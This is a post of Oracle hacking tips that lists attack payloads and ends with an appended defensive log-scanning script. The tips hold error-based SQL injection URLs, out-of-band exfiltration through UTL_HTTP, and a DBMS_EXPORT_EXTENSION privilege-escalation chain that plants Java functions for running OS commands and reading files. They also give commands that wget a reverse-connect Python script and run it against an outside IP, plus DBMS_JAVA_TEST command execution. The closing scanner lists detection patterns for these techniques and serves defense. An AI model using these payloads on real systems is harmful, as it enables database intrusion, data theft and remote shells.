Some Oracle Hacking Tips

OEM default port: 5500
Online Oracle hash-cracking site: http://ops.conus.info:669/ (doesn't seem very powerful)
Connecting to Oracle from a terminal:

su oracle
//local
sqlplus /nolog
conn username/password
//remote
sqlplus /nolog
conn username/password@(description=(address_list=(address=(protocol=tcp)(host=ip_address)(port=1521)))(connect_data=(SERVICE_NAME=orcl)));

Using utl_http:

and UTL_HTTP.request('http://IP:port/'||(sql statement))=1--

Error-based injection:

http://www.xx.com/xx.php?id=1 and 1=(select upper(XMLType(select banner from sys.v_$version where rownum=1)) from dual)--
http://www.xx.com/xx.php?id=1||utl_inaddr.get_host_name((select banner from v$version where rownum=1))
http://www.xx.com/xx.php?id=1 and 1=ctxsys.drithsx.sn(1,(select banner from v$version where rownum=1))--

Create a SQL file for reading and writing files; after logging in, run @filepath

The method created by linx, a well-known hacker in China; I recall the darkc0de injection script also uses this method, unfortunately I don't have that script :( (wget the reverse-connect script and run it)

select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader( new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'''';END;'';END;--','SYS',0,'1',0) from dual;
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual;
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual;
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile (java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual;
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual;
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual;
select sys.LinxRunCMD('/usr/bin/wget http://www.xx.com/docu/data/file/about/pyBack.py -O /var/tmp/pyBack.py') from dual;
select sys.LinxRunCMD('/usr/bin/python /var/tmp/pyBack.py 111.111.111.111 111') from dual;

Command execution released at Black Hat, with no output echoed; I tested it on Windows with no problems:

and (Select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe','/c','dir>c:\\OUT2.LST') FROM DUAL) is not null --

blackhat_hacking_oracl_2010 download
linx_oracle_php download
Using linx_oracle_php: since it relies on the UTL_HTTP package, the PHP script has to be hosted on an externally reachable server that the database can connect to. For the command-execution part, on Windows use cmd /c command directly, and on Linux use /bin/bash -c command directly.
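A defender-side complement to the injection and privilege-escalation payloads listed above, added here as an example that is not part of the original post: a small Python scanner that URL-decodes web access log and database audit lines and flags the Oracle packages these techniques depend on (UTL_HTTP, UTL_INADDR, CTXSYS.DRITHSX, XMLType, DBMS_EXPORT_EXTENSION, DBMS_JAVA_TEST.FUNCALL, DBMS_JAVA). The indicator labels and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Indicators taken from the techniques listed on this page: (label, regex) pairs.
# Matching is case-insensitive after URL decoding, because payloads are commonly
# case-varied and percent-encoded to slip past naive string filters.
INDICATORS = [
    ("utl_http out-of-band request", r"utl_http\s*\.\s*request\s*\("),
    ("utl_inaddr DNS exfiltration", r"utl_inaddr\s*\.\s*get_host_(name|address)\s*\("),
    ("ctxsys.drithsx error-based oracle", r"ctxsys\s*\.\s*drithsx\s*\.\s*sn\s*\("),
    ("XMLType error-based oracle", r"xmltype\s*\(\s*\(?\s*select\b"),
    ("DBMS_EXPORT_EXTENSION privilege escalation", r"dbms_export_extension\s*\.\s*get_domain_index_tables"),
    ("DBMS_JAVA_TEST.FUNCALL OS command execution", r"dbms_java_test\s*\.\s*funcall\s*\("),
    ("dbms_java.grant_permission", r"dbms_java\s*\.\s*grant_permission"),
]
COMPILED = [(label, re.compile(pat, re.IGNORECASE)) for label, pat in INDICATORS]

def normalize(line):
    """URL-decode twice (double encoding is common) and collapse whitespace."""
    decoded = unquote_plus(unquote_plus(line))
    return re.sub(r"\s+", " ", decoded)

def scan_line(line):
    """Return the labels of every indicator present in a single log line."""
    text = normalize(line)
    return [label for label, rx in COMPILED if rx.search(text)]

def scan_log(lines):
    """Return (line_number, labels) for each line that matches at least one indicator."""
    hits = []
    for n, line in enumerate(lines, start=1):
        found = scan_line(line)
        if found:
            hits.append((n, found))
    return hits

# Constructed sample input: three web-server access log lines and one
# database audit record. None of these come from a real system.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00] "GET /xx.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01] "GET /xx.php?id=1%20and%201%3Dctxsys.drithsx.sn(1,(select%20banner%20from%20v$version)) HTTP/1.1" 500 88',
    '10.0.0.9 - - [01/Jan/2024:10:00:02] "GET /xx.php?id=1||UTL_INADDR.GET_HOST_NAME((select%20user%20from%20dual)) HTTP/1.1" 500 88',
    "AUDIT scott: select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR',...) from dual",
]

if __name__ == "__main__":
    for n, labels in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(labels)}")
```

Feed it real access logs or unified-audit exports line by line; any hit on DBMS_EXPORT_EXTENSION or DBMS_JAVA_TEST from a non-DBA account is worth an immediate look, since legitimate applications almost never call them.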